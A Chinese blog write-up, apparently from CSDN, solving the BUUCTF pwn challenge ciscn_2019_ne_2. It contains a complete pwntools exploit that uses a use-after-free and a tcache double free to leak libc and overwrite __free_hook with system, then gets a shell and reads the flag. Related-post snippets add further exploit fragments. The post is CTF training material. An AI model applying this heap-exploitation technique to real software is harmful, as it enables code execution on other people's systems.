[BUUCTF-pwn] ciscn_2019_ne_2

最新推荐文章于 2022-09-28 14:11:31 发布
最新推荐文章于 2022-09-28 14:11:31 发布
阅读量490 收藏
点赞数
分类专栏: CTF pwn 文章标签: ci
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121127918
版权

自从300题后,难题让人搜不着,也有极简单的题,今天遇到一个

概况:

  1. c++写的程序,反汇编后一个字符串有1米长
  2. 冒: 6个字符依次或或6-1得到 H@QRPN
  3. free未清指针

步骤:

  1. 输入"NEUQRO" 开始
  2. 建80,70,10(/bin/sh\x00)
  3. free90 八次 70两次 show 0得到libc
  4. 建70 三次,依次写free_hook,x,system
  5. free 1
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xe31ee]
    offset = 0x3b12a0  #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps
else:
    p = remote('node4.buuoj.cn', 25510) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0x10a38c]
    offset = 0x3e82a0  #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps

#  [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')]
p.sendlineafter(b'name', b"NEUQRO")  

menu = b'> \n'
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b'input the size \n', str(size).encode()) #<=0x100
    p.sendlineafter(b"now you can input something...\n", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'input the index\n', str(idx).encode()) # UAF

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'input the index\n', str(idx).encode()) 

add(0x80, b'A')
add(0x10, b'/bin/sh\x00')
add(0x70, b'A')
[free(2) for _ in range(2)]
[free(0) for _ in range(8)]
show(0)
malloc_hook = u64(p.recvuntil(b'\x7f', drop=False).ljust(8, b'\x00')) - 0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
system    = libc_base + libc_elf.sym['system']
free_hook = libc_base + libc_elf.sym['__free_hook']
print('libc:', hex(libc_base))

context.log_level = 'debug'
add(0x70, p64(free_hook))
#gdb.attach(p)
#pause()
add(0x70, b'A')
add(0x70, p64(system))
free(1)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_en_2 ret2libc64
pondzhang的专栏
05-02 301
from pwn import * elf = ELF('./libc-2.23.so') p = process("./ciscn_2019_en_2") p.recvuntil('choice!\n') p.sendline("1") p.recvuntil('encrypted\n') poprdiret = 0x0000000000400c83 pltputs = 0x0000000000...
ciscn_2019_en_2
xieyichensss的博客
04-05 248
1.是64位的文件,拖入IDA分析,发现好复杂一串,我们直接在终端中运行一下,就知道其中的逻辑很简单选数字几就会进入其中的函数运行,这里我们要进入Encrypt函数,因为其中有gets函数和puts函数,我们要利用puts函数来泄露libc的地址值。 2.因为是64字节,我们先用垃圾数据覆盖一下栈,然后sp到ret指令的地址时,用pop_rdi_ret来将puts_got表的内容弹到rdi中,然后再去执行puts函数,最后回到main函数,这时已经泄露了puts函数的真实地址。 3.接下来,我们就应该获得l
【BUUCTF - PWN】ciscn_2019_en_2
古月浪子的博客
03-25 1174
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWN】ciscn_2019_c_1 附件:ciscn_2019_en_2
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2229
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 656
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
ciscn_2019_n_4
doudoudedi
02-03 1961
堆块上有悬挂的指针直接对它进行写入即可 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25967) elf=ELF('./ciscn_2019_n_4') libc=elf.libc def add(size,content): p.sen...
【pwn】ciscn_2019_es_2
Nothing
12-24 2760
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 825
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1001
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
ciscn_2019_n_1
weixin_44110537的博客
08-26 516
栈溢出覆盖掉v2为11.28125的存储形式从而打开后门. from pwn import * p=remote('xxxxxxxxxx',xxxxx) payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000) p.recvuntil('Let\'s guess the number.') p.sendline(payload) p.interactive() ...
jenkins-持续集成-创建job
雨水的早晨的博客
09-28 591
jenkins如何创建job
mac 安装jenkins,实现性能测试的持续集成
雨水的早晨的博客
09-27 655
找错误,安装jenkins的日志中有报错。BUT,启动了jenkins,但是访问。无能为力时,查看了brew的版本。安装jenkins时报各种错。继续脚本安装jenkins。
操作系统期末复习笔记!
最新发布
06-13
操作系统期末复习笔记
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值